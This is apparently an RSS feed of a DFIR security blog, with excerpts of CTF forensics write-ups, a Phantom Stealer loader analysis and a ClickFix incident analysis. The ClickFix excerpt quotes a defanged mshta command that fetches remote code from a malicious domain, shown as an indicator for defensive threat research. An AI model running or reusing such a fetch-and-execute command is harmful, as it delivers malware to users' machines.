https://p0peye-blog.pages.dev/Recent content on Ahmad Massd — Security BlogHugo -- gohugo.ioenahmad.massad.ir@gmail.com (Ahmad Massad)ahmad.massad.ir@gmail.com (Ahmad Massad)© 2026 Ahmad MassadWed, 20 Aug 2025 00:00:00 +0000https://p0peye-blog.pages.dev/posts/aliens-ctf-dfir/Wed, 20 Aug 2025 00:00:00 +0000ahmad.massad.ir@gmail.com (Ahmad Massad)https://p0peye-blog.pages.dev/posts/aliens-ctf-dfir/<h2 class="relative group">Challenge: 7 Oct <div id="challenge-7-oct" class="anchor"></div> <span class="absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none"> <a class="text-primary-300 dark:text-neutral-700 !no-underline" href="#challenge-7-oct" aria-label="Anchor">#</a> </span> </h2> <h3 class="relative group">Description <div id="description" class="anchor"></div> <span class="absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none"> <a class="text-primary-300 dark:text-neutral-700 !no-underline" href="#description" aria-label="Anchor">#</a> </span> </h3> <blockquote><p>We stormed one of the enemy&rsquo;s concentration areas and after completing the operation, we took some devices to investigate and obtain intelligence. One device belongs to a leader. We believe information is being leaked through a spy. Search the device to find the spy and location details — the enemy was planning a prisoner recovery operation and location information had been leaked to them.</p>https://p0peye-blog.pages.dev/posts/cyber-warriors-ctf-nashmi-apt/Sat, 16 Aug 2025 00:00:00 +0000ahmad.massad.ir@gmail.com (Ahmad Massad)https://p0peye-blog.pages.dev/posts/cyber-warriors-ctf-nashmi-apt/<p><figure><img class="my-0 rounded-md" loading="lazy" decoding="async" fetchpriority="low" alt="" src="https://miro.medium.com/v2/resize:fit:700/1*xmjWlgRCiaWpY7CiFRfAHg.png" ></figure> </p> <h2 class="relative group">Introduction <div id="introduction" class="anchor"></div> <span class="absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none"> <a class="text-primary-300 dark:text-neutral-700 !no-underline" href="#introduction" aria-label="Anchor">#</a> </span> </h2> <p>Our Security Operations Center (SOC) detected suspicious activity originating from an internal employee workstation. The employee — a finance team member — reported slow system performance and unexpected behavior. Shortly after, EDR logs showed signs of malware persistence and suspicious outbound traffic.</p> <p><strong>Mission:</strong> Analyze a full memory image of the compromised machine, identify the scope of the infection, and answer key investigation questions.</p>https://p0peye-blog.pages.dev/posts/phantom-stealer-analysis/Thu, 10 Jul 2025 00:00:00 +0000ahmad.massad.ir@gmail.com (Ahmad Massad)https://p0peye-blog.pages.dev/posts/phantom-stealer-analysis/<p><figure><img class="my-0 rounded-md" loading="lazy" decoding="async" fetchpriority="auto" alt="Phantom Stealer" width="1920" height="1080" src="https://p0peye-blog.pages.dev/posts/phantom-stealer-analysis/image_hu_5ce0c37a8458b04f.png" srcset="https://p0peye-blog.pages.dev/posts/phantom-stealer-analysis/image_hu_5ce0c37a8458b04f.png 800w, https://p0peye-blog.pages.dev/posts/phantom-stealer-analysis/image_hu_3c426dc241b76d8d.png 1280w" sizes="(min-width: 768px) 50vw, 65vw" data-zoom-src="https://p0peye-blog.pages.dev/posts/phantom-stealer-analysis/image.png"></figure> </p> <h2 class="relative group">Overview <div id="overview" class="anchor"></div> <span class="absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none"> <a class="text-primary-300 dark:text-neutral-700 !no-underline" href="#overview" aria-label="Anchor">#</a> </span> </h2> <p>Analysis of a malicious VBScript file (<code>LPO_337860.vbs.bin</code>) acting as a loader for <strong>Phantom Infostealer</strong>. The script employs heavy obfuscation, environmental checks, and persistence mechanisms.</p> <p><strong>Sample Information</strong></p> <table> <thead> <tr> <th>Field</th> <th>Value</th> </tr> </thead> <tbody> <tr> <td>Filename</td> <td><code>LPO_337860.vbs.bin</code></td> </tr> <tr> <td>MD5</td> <td><code>074a04eafe704a893655025b80beffb6</code></td> </tr> <tr> <td>File Type</td> <td>VBScript</td> </tr> <tr> <td>Threat</td> <td>Phantom Infostealer Loader</td> </tr> </tbody> </table> <hr> <h2 class="relative group">Stage 0 — VBScript Loader (<code>LPO_337860.vbs.bin</code>) <div id="stage-0--vbscript-loader-lpo_337860vbsbin" class="anchor"></div> <span class="absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none"> <a class="text-primary-300 dark:text-neutral-700 !no-underline" href="#stage-0--vbscript-loader-lpo_337860vbsbin" aria-label="Anchor">#</a> </span> </h2> <p>The initial VBScript acts as a <strong>deobfuscation and file-dropping engine</strong> in two steps:</p>https://p0peye-blog.pages.dev/posts/purematrixa-clickfix-analysis/Tue, 01 Jul 2025 00:00:00 +0000ahmad.massad.ir@gmail.com (Ahmad Massad)https://p0peye-blog.pages.dev/posts/purematrixa-clickfix-analysis/<h2 class="relative group">Incident Overview <div id="incident-overview" class="anchor"></div> <span class="absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none"> <a class="text-primary-300 dark:text-neutral-700 !no-underline" href="#incident-overview" aria-label="Anchor">#</a> </span> </h2> <p>While conducting a threat hunting deep dive into a resolved <strong>ClickFix</strong> incident, I tracked the infection chain back to the landing domain <code>turbowave45[.]com</code>. The original execution chain on the target Windows workstation was highly indicative of a modern social engineering / fake update lure:</p> <div class="highlight-wrapper"><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>chrome.exe → explorer.exe → powershell.exe → mshta.exe https://purematrixa[.]com/1751517</span></span></code></pre></div></div> <p>The EDR flagged and killed the process at:</p>https://p0peye-blog.pages.dev/about/Wed, 01 Jan 2025 00:00:00 +0000ahmad.massad.ir@gmail.com (Ahmad Massad)https://p0peye-blog.pages.dev/about/<h2 class="relative group">Hi, I&rsquo;m Ahmad Massad <div id="hi-im-ahmad-massad" class="anchor"></div> <span class="absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none"> <a class="text-primary-300 dark:text-neutral-700 !no-underline" href="#hi-im-ahmad-massad" aria-label="Anchor">#</a> </span> </h2> <p>I&rsquo;m a DFIR Investigator specializing in Windows internals, memory forensics, and kernel-level telemetry. Rooted in proactive threat hunting, my focus is on dissecting complex attacks, analyzing malware, and building custom defensive tools to get as close to the metal as possible. When I&rsquo;m not deep in an investigation, I&rsquo;m usually competing in CTFs, sharpening my reverse engineering skills, or hitting the weights at the gym. This space is my digital command center for sharing technical research, write-ups, and practical lessons learned from the trenches.</p>